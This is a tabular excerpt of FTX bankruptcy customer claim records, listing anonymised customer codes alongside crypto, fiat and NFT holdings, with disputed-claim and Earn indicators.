| 07301679 | | USDT[0.64150000], XRP[.67468838] | | |
| 07301681 | | FTX_EQUITY[0], USD[21.29] | | |
| 07301685 | | ETH[.000538], ETHW[.000538] | | |
| 07301710 | | ETH[.00371735], ETHW[.00371735], USDT[0.00000348] | | |
| 07301712 | | BTC[.00004013], ETH[.0000562], SHIB[1], USD[7661.69], USDT[.00003547] | Yes | |
| 07301715 | | DOGE[.031], KSHIB[4.09], USD[100.29] | | |
| 07301718 | | USD[0.32] | | |
| 07301720 | | USD[0.03] | | |
| 07301723 | | BCH[0], DOGE[0], USD[0.00], USDT[0.00000002] | | |
| 07301727 | | BTC[.00004072], USD[0.00] | | |
| 07301736 | | USD[94.74] | | |
| 07301739 | | BTC[0] | | |
| 07301740 | | AVAX[0.00758039], BTC[-0.00003654], ETH[0], MATIC[0], SOL[.00314326], USD[1.28], USDT[0] | | |
| 07301749 | | USDT[0] | | |
| 07301759 | | BF_POINT[300], BTC[0.00000001], ETH[0], NFT (369075764133468141/The Hill by FTX #8208)[1], NFT (457582983699017586/Romeo #845)[1], NFT (523225612162756623/Entrance Voucher #2448)[1], USD[0.00], USDT[0] | Yes | |
| 07301771 | | USD[0.00] | | |
| 07301776 | | BTC[0], ETH[.00023362], ETHW[0.00023362] | | |
| 07301783 | | NFT (535624473735236612/Blue Mist #338)[1] | | |
| 07301784 | | ETH[.29078724], ETHW[.29078724] | | |
| 07301797 | | NFT (440005270896131990/Chadwick, the Interesting)[1], NFT (503459189741813457/Sollama)[1], SOL[0], USD[0.00] | Yes | |
| 07301799 | | USD[0.00], USDT[0] | | |
| 07301804 | | BTC[0.00002240], ETH[0], ETHW[0], MATIC[1.00164518], SHIB[1], SOL[0], TRX[1], USD[28.97] | Yes | |
| 07301811 | | BTC[0], ETH[0], SOL[0], TRX[.000002], USD[0.00], USDT[0.00001346] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07301812 | | USD[1.78] | | |
| 07301813 | | AAVE[0], BTC[0], ETH[0], ETHW[0], MATIC[0], NFT (299960684590069842/FTX - Off The Grid Miami #1256)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07301816 | | BTC[0], ETH[0] | | |
| 07301821 | | BTC[0.00004277], ETH[.000461], ETHW[.000461], SUSHI[10.458], USD[0.29] | | |
| 07301828 | | USDT[3.916405] | | |
| 07301829 | | NFT (406924704886264930/Miami Ticket Stub #859)[1] | | |
| 07301833 | | NFT (319722207091735935/FTX - Off The Grid Miami #2667)[1], NFT (401339649173202706/Australia Ticket Stub #1824)[1], NFT (404005271869320810/Entrance Voucher #2108)[1], USD[9.60] | | |
| 07301843 | | USD[0.00] | | |
| 07301849 | | USD[0.00] | | |
| 07301863 | | USDT[.5315664] | | |
| 07301865 | | SOL[6], USD[0.00] | | |
| 07301872 | | USD[0.00] | | |
| 07301873 | | LINK[0], USDT[0.00000009] | | |
| 07301879 | | BTC[0.00000833], SOL[5.0644], USD[0.49] | | |
| 07301883 | | BTC[0], ETH[.00016603], ETHW[.00016603], USD[8.14] | | |
| 07301890 | Contingent, Disputed | BTC[1.22205346], ETH[4.64854732], ETHW[4.64854732], USD[1.00] | | |
| 07301908 | | BAT[4.00869189], BRZ[7.01246906], DOGE[2], GRT[3], NEAR[0], SHIB[11], SOL[.54619222], SUSHI[0], TRX[12], USD[0.01], USDT[3.05112052] | Yes | |
| 07301911 | | BTC[.00207007], USD[-13.00] | | |
| 07301915 | Contingent, Disputed | USD[3656.31] | | |
| 07301923 | Contingent, Disputed | BTC[0.01465411], USD[1.15] | | |
| 07301925 | | USD[0.00] | | |
| 07301928 | | BTC[0] | | |
| 07301932 | | BAT[1.992], BCH[.002988], BCHA[.002988], CUSDT[18.712], ETH[.001992], ETHW[.001992], LTC[.03976], PAXG[.0000964], USD[2.06], XRP[2.94] | | |
| 07301937 | Contingent, Disputed | BTC[.42143706], USD[0.00] | | |
| 07301938 | Contingent, Unliquidated | USD[0.00] | Yes | |
| 07301951 | | AVAX[1.49743681], SHIB[1], USD[156.01] | Yes | |
| 07301954 | Contingent, Disputed | USD[478.55] | | |
| 07301966 | Contingent, Disputed | BTC[.25470729], USD[6100.00] | | |
| 07301968 | | BTC[0], DOGE[11042.5553], LTC[.003967], SOL[.018474], SUSHI[1745.7928], UNI[.03166], USD[0.01], USDT[0], YFI[.0017464] | | |
| 07301970 | | LTC[.009], USD[0.00], USDT[0] | | |
| 07301981 | | BAT[0], BTC[0], DOGE[0], ETH[0.00000001], ETHW[0], LTC[0], SOL[0], USD[0.00] | | |
| 07301984 | | LTC[.00992298], USD[0.00], USDT[.008] | | |
| 07301987 | | BTC[0], USD[0.33] | | |
| 07301989 | | USD[0.00] | | |
| 07301993 | | BTC[0], ETH[0.00057442], ETHW[0.00057442], USD[0.00], USDT[0] | | |
| 07301994 | | USDT[0] | | |
| 07301999 | | USD[2.55], USDT[0] | | |
| 07302010 | | BTC[0], ETH[.00000001], ETHW[0.00007297], SOL[0], USD[0.00], USDT[0] | | |
| 07302016 | | SOL[4.8804], TRX[.00003], USD[7.90], USDT[1800.39075] | | |
| 07302022 | | SOL[1.8959013], TRX[.000002], USD[0.60] | | |
| 07302025 | Contingent, Disputed | BTC[.3218076], USD[5003.58] | | |
| 07302027 | Contingent, Disputed | BTC[.50671432], USD[0.00] | | |
| 07302030 | Contingent, Disputed | BTC[.08442553], USD[0.00] | | |
| 07302031 | | AAVE[.002], ETH[.00000001], KSHIB[1.544], LINK[.03844], LTC[.00036], SOL[.007632], SUSHI[.31], UNI[.0252], USD[9.25], USDT[0], YFI[.0002976] | | |
| 07302032 | | USD[0.00], USDT[0] | | |
| 07302033 | Contingent, Disputed | BTC[.32939974], USD[0.00] | | |
| 07302035 | Contingent, Disputed | USD[1500.00] | | |
| 07302036 | Contingent, Disputed | USD[5000.00] | | |
| 07302037 | Contingent, Disputed | USD[4300.00] | | |
| 07302046 | Contingent, Disputed | USD[999.00] | | |
| 07302050 | Contingent, Disputed | USD[1601.00] | | |
| 07302052 | Contingent, Disputed | BTC[.0170316], USD[1781.84] | | |
| 07302054 | Contingent, Disputed | USD[1024.00] | | |
| 07302055 | Contingent, Disputed | USD[450.00] | | |
| 07302056 | Contingent, Disputed | USD[1100.00] | | |
| 07302059 | Contingent, Disputed | BTC[.73254434], USD[0.06] | | |
| 07302062 | Contingent, Disputed | USD[990.00] | | |
| 07302065 | Contingent, Disputed | BTC[.082668], USD[2610.35] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07302066 | | ETH[.00050655], ETHW[.00050655], SOL[.72474], USD[33.88] | | |
| 07302082 | Contingent, Disputed | BTC[.43843366], USD[0.00] | | |
| 07302084 | Contingent, Disputed | BTC[1.42506638], USD[0.00] | | |
| 07302085 | | USD[0.00], USDT[0.00000002] | | |
| 07302086 | Contingent, Disputed | USD[9192.11] | | |
| 07302091 | Contingent, Disputed | BTC[.016932], USD[780.41] | | |
| 07302092 | | BTC[0], ETH[0] | | |
| 07302093 | Contingent, Disputed | USD[2300.00] | | |
| 07302099 | Contingent, Disputed | BTC[.3696156], USD[7.24] | | |
| 07302104 | | USD[0.00] | | |
| 07302107 | Contingent, Disputed | BTC[.025398], USD[670.80] | | |
| 07302108 | Contingent, Disputed | USD[2601.00] | | |
| 07302109 | Contingent, Disputed | BTC[.0232068], USD[749.79] | | |
| 07302112 | Contingent, Disputed | USD[970.00] | | |
| 07302114 | Contingent, Disputed | USD[994.00] | | |
| 07302116 | Contingent, Disputed | USD[949.00] | | |
| 07302118 | Contingent, Disputed | USD[980.00] | | |
| 07302121 | | USD[0.00] | | |
| 07302125 | | AAVE[0], BTC[0.00000001], ETH[0], SOL[0], USD[0.00], USDT[0.00180400] | | |
| 07302127 | | USD[0.01] | | |
| 07302129 | | USD[0.00], USDT[20.48938104] | | |
| 07302131 | Contingent, Disputed | USD[980.00] | | |
| 07302132 | | BTC[0.00000848], USD[0.04] | | |
| 07302136 | | USD[0.32] | | |
| 07302138 | | NFT (510803461495046296/Series 1: Capitals #426)[1], USD[10005.57] | Yes | |
| 07302141 | Contingent, Disputed | USD[988.00] | | |
| 07302143 | Contingent, Disputed | USD[950.00] | | |
| 07302147 | Contingent, Disputed | USD[955.00] | | |
| 07302149 | Contingent, Disputed | USD[960.00] | | |
| 07302176 | | BTC[0.00009990], USD[2.01] | | |
| 07302181 | | ETH[.346517], ETHW[.03996], NFT (352065557022976543/Humpty Dumpty #1383)[1], SOL[.00215], USD[0.81] | | |
| 07302186 | | USD[0.00] | | |
| 07302193 | | BCH[.00069029], USDT[.4034743] | | |
| 07302202 | | USD[78.45], USDT[.00987] | | |
| 07302216 | | BTC[.00018269], USD[1.13] | | |
| 07302217 | | ETH[.00000001], ETHW[0], USD[32.10] | | |
| 07302256 | | BTC[.00004474], SOL[0.00823116], USD[0.00] | | |
| 07302257 | | USD[2.24] | | |
| 07302272 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], NFT (454256156466626999/Microphone #386)[1], SOL[0], SUSHI[0], USD[0.53], USDT[0] | | |
| 07302275 | | USDT[494] | | |
| 07302277 | | USD[0.00] | | |
| 07302279 | | BTC[0], DOGE[0], ETH[0], USD[1.51], USDT[0] | | |
| 07302297 | | BTC[0], PAXG[.000996], USDT[0.05302993] | | |
| 07302299 | | LTC[.00341], NFT (334629970834338648/Microphone #356)[1], USD[2.24] | | |
| 07302302 | | ETH[0], ETHW[0.00881542], LTC[0], SOL[0], USD[0.01] | | |
| 07302312 | | USD[0.00] | | |
| 07302318 | | SUSHI[.4658], USD[0.01] | | |
| 07302322 | | ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07302329 | | BTC[0], NFT (341975632104222356/FTX - Off The Grid Miami #4929)[1], SOL[0.00528049], SUSHI[.00000001], USD[2.77] | | |
| 07302336 | | ETH[.00000001], ETHW[0], SOL[0] | | |
| 07302338 | | USD[17.56] | | |
| 07302342 | | ETH[.00000001] | | |
| 07302350 | | USD[0.01], USDT[0.01884926] | | |
| 07302351 | | BTC[0.00045125], ETH[0], ETHW[0], GRT[9.61681544], LTC[0], MATIC[0], SOL[0], USD[0.01] | | |
| 07302355 | | USD[1197.20] | | |
| 07302385 | | CUSDT[17.1867], USD[41.01] | | |
| 07302400 | | BTC[0], LTC[0], SOL[.00000001], USD[4.34], USDT[0] | | |
| 07302402 | | BTC[0.00007888], ETH[.00000001], ETHW[4.69030500], NFT (400142715494890448/Juliet #178)[1], NFT (448466018901081281/Romeo #10322)[1], NFT (541356083058756503/Humpty Dumpty #1450)[1], UNI[.05], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07302408 | | NFT (5567222776684856658/FTX - Off The Grid Miami #2616)[1] | | |
| 07302415 | | BTC[0], USD[0.00], USDT[0] | | |
| 07302424 | | ETH[.00000001], NFT (291925205298329749/Coogi #5301)[1] | | |
| 07302433 | | USD[25.00] | | |
| 07302435 | Contingent, Disputed | USD[0.01] | | |
| 07302437 | | BTC[0] | | |
| 07302444 | | USD[2.03] | | |
| 07302450 | | USD[1.83], USDT[0.00000026] | | |
| 07302451 | | BTC[0], DOGE[0], ETH[0], SOL[.00000001], SUSHI[0], USD[0.00], USDT[0.00001803] | | |
| 07302452 | | AAVE[0], BAT[2.07942155], BTC[0], DOGE[0], ETHW[.10121623], KSHIB[1690], NFT (296796937426716273/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #4)[1], NFT (309232338092854877/MagicEden Vaults)[1], NFT (317945292955805242/Fox #4364)[1], NFT (368882663254923182/Australia Ticket Stub #1328)[1], NFT (409688491289431331/Famous Fox Crystal)[1], NFT (410770569871538307/MagicEden Vaults)[1], NFT (413081723640944784/MagicEden Vaults)[1], NFT (422992350275081801/Humpty Dumpty #55)[1], NFT (440766566412752982/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1983 #1)[1], NFT (443924164441629656/MagicEden Vaults)[1], NFT (447237148555528096/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #4)[1], NFT (456395913533137730/2021 Sports Illustrated Awards #2)[1], NFT (536651362584737217/MagicEden Vaults)[1], NFT (549484626781004479/Famous Fox Crystal)[1], NFT (566537527485946964/President Fineroo 103%)[1], SUSHI[3.15456918], USD[0.00], USDT[2.04204971] | Yes | |
| 07302464 | | BTC[0], SOL[0.92550015], USD[0.31], USDT[0.00006030] | | |
| 07302466 | | UNI[.0334], USD[0.22] | | |
| 07302472 | | USD[2.11] | | |
| 07302476 | | LTC[.00871], NFT (356222583572523467/Romeo #988)[1], NFT (378375544363135695/Entrance Voucher #4181)[1], NFT (552109283762074755/Good Boy #5748)[1], USD[0.15] | | |
| 07302479 | | USD[0.00] | | |
| 07302483 | | BTC[0], USDT[0.00001603] | | |
| 07302488 | | BTC[0], SOL[0], USD[1.70] | | |
| 07302489 | | ETH[.05], ETHW[.05], NFT (298411720655536213/ffff)[1], NFT (365693935275573318/Cost of Creation)[1], USD[0.88] | | |
| 07302490 | | USD[1.66] | | |
| 07302492 | | USD[48374.86] | | |
| 07302493 | | NFT (416621242402899348/Serum Surfers X Crypto Bahamas #88)[1], NFT (443899826635674392/FTX Crypto Cup 2022 Key #2472)[1], NFT (481320875299062922/Computer Generated Dino CGD 291)[1] | | |
| 07302494 | | BTC[0.00842123], FTX_EQUITY[0], NFT (298070661142075318/Solana Hacker House Miami 2021)[1], NFT (298440246782708555/Celestial Energy)[1], NFT (320943579819436309/nothing lasts forever )[1], NFT (325697871426187024/Celestial Energy)[1], NFT (328549244021724812/Galaxy Mint Pass)[1], NFT (339954560815571259/Carved Pumpkin)[1], NFT (350884238069514475/Skyline FLP)[1], NFT (373357913744682965/SoAE: Alea lacta Est 2nd Place)[1], NFT (376479675136196327/Puppy #158)[1], NFT (386817680809285885/SKULL Staking)[1], NFT (392561899590027520/Puppy #7077)[1], NFT (406549163476586682/Over the Moon)[1], NFT (408225742270056797/Katana Early Access Pass)[1], NFT (414695311824514925/Puppy #7648)[1], NFT (415622163006930973/Puppy #87)[1], NFT (417680076445964598/DeODod Brawler Skin #2816)[1], NFT (421532400844459307/Ayyo and the Astronauts)[1], NFT (428136182186850684/Vintage Cartoon SKULL)[1], NFT (430030193255307273/SoAE: Ad Astra 1st Place)[1], NFT (436567867825066943/Soulless X SkeletonCrew)[1], NFT (444438528425069588/Galaxy Mint Pass)[1], NFT (453136232041269232/Party Pixels)[1], NFT (455300282044373815/Galaxy Mint Pass)[1], NFT (459360218759730748/Geckos Spaceship)[1], NFT (467863786145754396/Nest Quest #25)[1], NFT (487166934471740113/SoAE: Aere Perennius 3rd Place)[1], NFT (496953326470066321/&mut self #3)[1], NFT (498679106373292551/Informal Abstraction)[1], NFT (507330267981978204/Celestial Energy)[1], NFT (524493019605884174/Galaxy Mint Pass)[1], NFT (533697879059868296/Galaxy Mint Pass)[1], NFT (537456390875554571/Puppy #5970)[1], NFT (544090462062807490/Waifu #2257)[1], NFT (555504336139198491/Puppy #7312)[1], USD[0.00], WEST_REALM_EQUITY_POSTSPLIT[0] | | |
| 07302497 | | BAT[1], BRZ[1], BTC[0.00008223], CUSDT[12], DOGE[5], ETH[0], ETHW[.000187], GRT[4.08206668], MATIC[0], NFT (304030429896640154/Colossal Cacti #671)[1], NFT (517605887731398865/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #72)[1], SHIB[1], SOL[0], TRX[5], USD[0.00], USDT[2.13871444], YFI[0] | Yes | |
| 07302500 | | ETH[0], SOL[0], USDT[0.00031585] | | |
| 07302505 | | SOL[6.972], USD[1.22] | | |
| 07302512 | | AVAX[.00000001], BTC[0], DAI[.00000001], ETH[.03246489], ETHW[.03246489], SOL[.064], UNI[3.5856], USD[335.76], USDT[0.00000001] | | |
| 07302515 | | AVAX[.08434451], USD[0.00] | | |
| 07302517 | | DOGE[1.1675], USD[5.07] | | |
| 07302518 | | BTC[0.00095024], DOGE[.8406], ETH[.0008748], ETHW[.0008748], LINK[.06376], LTC[.00779], SOL[.0991], SUSHI[.4756], TRX[.776], UNI[.01924], USD[1.04], USDT[0.00785557] | | |
| 07302519 | | ETH[0], NEAR[0], USD[0.00] | | |
| 07302527 | | BTC[0.00732514], USD[0.00] | | |
| 07302536 | | USD[2.17] | | |
| 07302538 | | BTC[.0775224], LTC[.0023], USD[0.75] | | |
| 07302549 | | ETH[0], SOL[0.00740800], USD[0.00] | | |
| 07302559 | | USDT[0.21015428] | | |
| 07302561 | | USD[0.00] | | |
| 07302565 | | BTC[0], GBP[0.96], USD[0.00] | | |
| 07302575 | | DOGE[41589.459], MATIC[.6], SOL[.00204], USD[1.18], USDT[.82375] | | |
| 07302576 | | BF_POINT[200], BTC[.00000803], ETH[.00000055], ETHW[.05920471], LINK[43.32806055], SHIB[33144.59584727], SOL[.0001827], USD[0.00] | Yes | |
| 07302582 | | USD[0.01] | | |
| 07302583 | | NFT (511668613080880591/Imola Ticket Stub #1424)[1], USD[0.05], USDT[0] | | |
| 07302584 | | SOL[0], USD[0.00], USDT[0.00038781], YFI[0] | | |
| 07302591 | | BTC[0], ETH[0], SHIB[1], TRX[1], USD[62.71], USDT[0] | Yes | |
| 07302596 | | USD[0.75] | | |
| 07302601 | | KSHIB[9.34], USD[0.00] | | |
| 07302610 | | USD[0.16] | | |
| 07302616 | | BTC[0.00005124], ETH[0.00037574], ETHW[0.00620070], USD[236167.87] | | |
| 07302617 | Contingent, Disputed | BTC[0], USD[1.75] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07302619 | | ETHW[.62085675] | | |
| 07302627 | | BTC[0], DOGE[0.35818887], ETH[0.00017305], ETHW[0.05251560], SOL[0], TRX[.28766748], USD[1234.28], USDT[0] | | |
| 07302631 | | BTC[0], GRT[.00199241], MATIC[.00006131], NFT (346316571663815036/Snippets of The Common Dream)[1], SHIB[10], SOL[0], USD[0.00], USDT[0.00000927] | Yes | |
| 07302635 | | USD[4.25] | | |
| 07302649 | | USD[0.00] | | |
| 07302655 | | USD[0.00] | | |
| 07302656 | | USD[0.01] | | |
| 07302658 | | PAXG[.12977909], USD[0.00] | | |
| 07302668 | | USD[0.16] | | |
| 07302670 | Contingent, Disputed | USD[0.00] | | |
| 07302685 | | BTC[.00004061], USD[0.00] | | |
| 07302690 | | BTC[.000026], SOL[.0996] | | |
| 07302700 | | USDT[0.00000393] | | |
| 07302702 | | USD[0.00], USDT[3.21568695] | | |
| 07302704 | | USDT[0] | | |
| 07302706 | | BTC[.00000284], DAI[.0688897], USD[0.00], USDT[.001839] | | |
| 07302707 | | AAVE[0], BTC[0], DOGE[0], ETH[0], ETHW[0.00099134], GRT[0], LINK[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0.82552100] | | |
| 07302714 | | SOL[.00000001] | | |
| 07302717 | Contingent, Disputed | BTC[0.61652240], ETH[.000564], ETHW[.000564], USD[1.60] | | |
| 07302718 | | NFT (45294654285389645+/FTX - Off The Grid Miami #2754)[1] | | |
| 07302720 | | USD[0.01] | | |
| 07302730 | | BTC[.001], USDT[.263145] | | |
| 07302736 | | BTC[.00005779], ETH[.00017975], ETHW[0.00017974], USD[3.05] | | |
| 07302743 | | USD[3.03] | | |
| 07302744 | | NFT (482278916588594941/FTX - Off The Grid Miami #4728)[1], TRX[.000209], USD[0.00], USDT[0] | | |
| 07302747 | | ETH[.02288382], ETHW[0.02288381] | | |
| 07302748 | | BTC[.01992], USD[3.66] | | |
| 07302752 | | USD[5.20] | | |
| 07302756 | | BTC[0] | | |
| 07302759 | | ETH[.00000001], ETHW[0], NFT (533899330643367644/2974 Floyd Norman - OKC 2-0208)[1], USD[0.00], USDT[0] | | |
| 07302760 | | USD[0.41] | | |
| 07302761 | | BTC[0.00067765], ETH[.00088371], ETHW[.00088371], LTC[.00888], SOL[0], USD[0.46], USDT[0] | | |
| 07302765 | | DOGE[.30945], USD[0.04], USDT[0] | | |
| 07302771 | | USD[0.00], USDT[0.00000125] | | |
| 07302777 | | TRX[.011175], USD[0.00], USDT[0] | | |
| 07302782 | | USD[3395.97] | | |
| 07302787 | | BTC[0], USD[0.00] | | |
| 07302789 | Contingent, Disputed | BTC[.6690092], USD[11.38] | | |
| 07302792 | | AAVE[.00785], BTC[0], DOGE[.9], MATIC[0], MKR[.000622], NFT (355345603907921502/Generative Art #5)[1], NFT (356135317968444965/Primitive #4)[1], NFT (409771771395527523/Collection 1)[1], NFT (417174553160576478/Generative Art #4)[1], NFT (418234543140939376/Generative Art)[1], NFT (419856021125195108/Fancy Frenchies #1301)[1], NFT (424906499490745509/Generative Art #2)[1], NFT (528646290348420454/Sunset Series)[1], NFT (543344763858365053/Cyber Pharmacist 0021)[1], NFT (553662027458932026/Generative Art #3)[1], NFT (560824668679372097/Fortune Cookies #8)[11, NFT (564829101597690206/Cyber Pharmacist 0336)[1], UNI[.00000001], USD[0.00], USDT[0] | | |
| 07302797 | | AAVE[.29], BCH[.00031986], DOGE[.556], ETH[.00097673], ETHW[0.00097673], LINK[1.01343712], LTC[.00655053], SOL[.07264], TRX[.356944], USD[1882.07], USDT[217.97270511] | | |
| 07302815 | | SOL[0] | | |
| 07302821 | Contingent, Disputed | USD[2655.40] | | |
| 07302833 | | BTC[0], USD[0.00] | | |
| 07302842 | | USD[0.00] | | |
| 07302845 | | BTC[.0001082], SOL[1.54845] | | |
| 07302848 | | BTC[0], ETH[0], SUSHI[0], TRX[.308], USD[0.12], USDT[0] | | |
| 07302849 | | ETH[.0005], ETHW[.0005], USD[3.15] | | |
| 07302853 | | USD[25.00] | | |
| 07302860 | Contingent, Disputed | BTC[.0094639], USD[4900.57] | | |
| 07302862 | | ETH[.00000001], SOL[0], USD[1.78] | | |
| 07302865 | | BTC[0], ETH[.000609], ETHW[.000609], PAXG[.00019928], USD[0.38] | | |
| 07302867 | | DAI[.00902806], TRX[.000003], USD[0.00], USDT[3.767517] | | |
| 07302869 | | USD[1.00], USDT[0.00000040] | | |
| 07302891 | | BCH[.003996], BCHA[.001998], BTC[0], USD[0.00], USDT[0] | | |
| 07302892 | | USD[30.00] | | |
| 07302893 | | USD[30.00] | | |
| 07302894 | | USD[30.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07302895 | | USD[20.00] | | |
| 07302896 | | USD[20.00] | | |
| 07302899 | | BTC[0], SOL[0] | | |
| 07302906 | | USD[0.58] | | |
| 07302913 | | USD[20.00] | | |
| 07302914 | | USD[20.00] | | |
| 07302918 | | BTC[0.00105627], ETH[.0004102], ETHW[.0004102], SUSHI[.4911], USD[0.00] | | |
| 07302922 | | USD[20.00] | | |
| 07302923 | | SOL[0], USD[0.00] | | |
| 07302932 | | USD[20.00] | | |
| 07302933 | | USD[20.00] | | |
| 07302934 | | USD[20.00] | | |
| 07302936 | | USD[20.00] | | |
| 07302943 | | USD[20.00] | | |
| 07302945 | | USD[20.00] | | |
| 07302946 | Contingent, Disputed | USD[9.24] | | |
| 07302947 | | BTC[0], USD[0.00], USDT[0] | | |
| 07302948 | | USD[20.00] | | |
| 07302953 | | ETH[0], USD[0.00] | | |
| 07302955 | Contingent, Disputed | ETH[0], USD[1.22] | | |
| 07302958 | | USD[2705.31], USDT[0] | | |
| 07302960 | | BTC[0], DOGE[0], NFT (291142894830592748/GSW Championship Commemorative Ring)[1], NFT (311361126082958330/GSW Western Conference Semifinals Commemorative Ticket #272)[1], NFT (328519061864149474/GSW Championship Commemorative Ring)[1], NFT (358409303525681001/GSW Western Conference Finals Commemorative Banner #484)[1], NFT (378717523134447691/GSW Western Conference Finals Commemorative Banner #480)[1], NFT (403433956259901782/Warriors Logo Pin #649 (Redeemed))[1], NFT (423393822525971775/GSW Western Conference Finals Commemorative Banner #482)[1], NFT (427402744987272383/GSW Western Conference Finals Commemorative Banner #481)[1], NFT (430643587518175336/GSW Championship Commemorative Ring)[1], NFT (448401346627302295/GSW Round 1 Commemorative Ticket #197)[1], NFT (449011374743761128/GSW Western Conference Semifinals Commemorative Ticket #271)[1], NFT (468546543127003353/GSW Western Conference Finals Commemorative Banner #485)[1], NFT (473294429744485433/Warriors Foam Finger #188 (Redeemed))[1], NFT (501748040265983272/GSW Round 1 Commemorative Ticket #198)[1], NFT (524369052943384048/GSW Western Conference Finals Commemorative Banner #483)[1], NFT (528247190916118688/Warriors Logo Pin #161 (Redeemed))[1], NFT (565901826481904233/GSW Western Conference Semifinals Commemorative Ticket #270)[1], SOL[0], USD[0.00] | | |
| 07302962 | | BTC[0], DOGE[3.77688308], UNI[0], USD[0.00] | | |
| 07302970 | | BTC[0], USD[0.01] | | |
| 07302971 | | DAI[.00000001], LTC[.00013], SHIB[1898100], USD[703.93] | | |
| 07302984 | Contingent, Disputed | USD[0.01] | | |
| 07302985 | | BTC[0.00000098], ETH[1.581], ETHW[1.581], SOL[29.82015], USD[28.12] | | |
| 07302986 | | USD[0.00] | | |
| 07302989 | Contingent, Disputed | USD[0.00] | | |
| 07302990 | | USDT[0.00000143] | | |
| 07303000 | | NFT (473609811770641966/Australia Ticket Stub #1436)[1], NFT (506295542531647997/Barcelona Ticket Stub #288)[1], TRX[.000006] | | |
| 07303001 | | DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.13], USDT[0.00002068] | | |
| 07303009 | | USDT[1033.43343130] | | |
| 07303015 | | USD[0.00] | | |
| 07303022 | | BRZ[1], DOGE[0], ETH[0], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07303025 | Contingent, Disputed | BTC[.22659], USD[0.23] | | |
| 07303026 | | PAXG[.011988], SOL[14.985], USDT[38.8665] | | |
| 07303034 | | AUD[0.00], CAD[0.00], NEAR[0], USD[0.17], USDT[0.00000197] | | |
| 07303039 | | BTC[0], ETH[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00004979] | | |
| 07303051 | Contingent, Disputed | BTC[.2886111], USD[0.64] | | |
| 07303066 | | BTC[0], DOGE[0], ETH[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000046] | | |
| 07303069 | | NFT (298194650972969612/HOG #509)[1], NFT (300165327598192089/The Pigsels #10)[1], NFT (316695066180849073/HOG #513)[1], NFT (317269929594060387/Mech #7195)[1], NFT (321136153233854004/HOG #501)[1], NFT (321429191541196875/The Pigsels #52)[1], NFT (324452805209145407/Mech #3131)[1], NFT (335439584866194200/The Pigsels #153)[1], NFT (338988431483782235/HOG #502)[1], NFT (346176962909923841/Mech #1482)[1], NFT (348057452647273768/The Pigsels #199)[1], NFT (350454736348733529/Metabaes #4079)[1], NFT (350737766526852575/KAM1 #1281)[1], NFT (360202575277635247/Magic Box)[1], NFT (368762777129602816/KAM1 #4030)[1], NFT (376239263086790848/HOG #517)[1], NFT (380106730833347510/Mech #5924)[1], NFT (383623820782429381/The Pigsels #275)[1], NFT (384896913089680111/The Pigsels #117)[1], NFT (389889165202231069/The Pigsels #158)[1], NFT (393430114131445056/HOG #507)[1], NFT (404012166982364262/HOG #504)[1], NFT (408132494497287497/The Pigsels #339)[1], NFT (413260094384483991/Mech #8333)[1], NFT (426011147263729716/Mech #990)[1], NFT (432027461961342385/KAM1 #1783)[1], NFT (441639123835410218/HOG #512)[1], NFT (447169227439475273/HOG #508)[1], NFT (459568306020329646/Hannya Mask)[1], NFT (468175335658309327/Mech #963)[1], NFT (475102532684537906/The Pigsels #571)[1], NFT (478919919458636563/HOG #506)[1], NFT (479477474942513785/HOG #503)[1], NFT (497726734156987628/MEGAM1 #5567)[1], NFT (533477604173533704/The Pigsels #418)[1], NFT (539742259808659066/HOG #511)[1], NFT (553628323409918974/MEGAM1 #3504)[1], NFT (556558208659499698/The Pigsels #250)[1], NFT (567920548653114533/The Pigsels #239)[1], NFT (573615872248019727/Mech #994)[1], SOL[.00616474], USD[0.11] | | |
| 07303077 | | USD[0.01] | | |
| 07303080 | | USD[0.00] | | |
| 07303093 | Contingent, Disputed | USD[2000.00] | | |
| 07303094 | | USD[0.00] | | |
| 07303110 | | BTC[0], ETH[0.00000002], ETHW[0], KSHIB[0], PAXG[0], SOL[0], USD[0.63], USDT[0.00000152] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07303114 | | AAVE[.08320244], AVAX[0], DOGE[16.082], MATIC[2.91], SHIB[200000], SUSHI[2.221], UNI[1.00919662], USD[0.00] | | |
| 07303115 | | USD[0.00], USDT[0.00000258] | | |
| 07303117 | | BTC[0.00000273], ETH[0], USD[0.00], USDT[0.00003608] | | |
| 07303118 | | LTC[.00376082], USD[10.01] | | |
| 07303119 | | USD[0.29] | | |
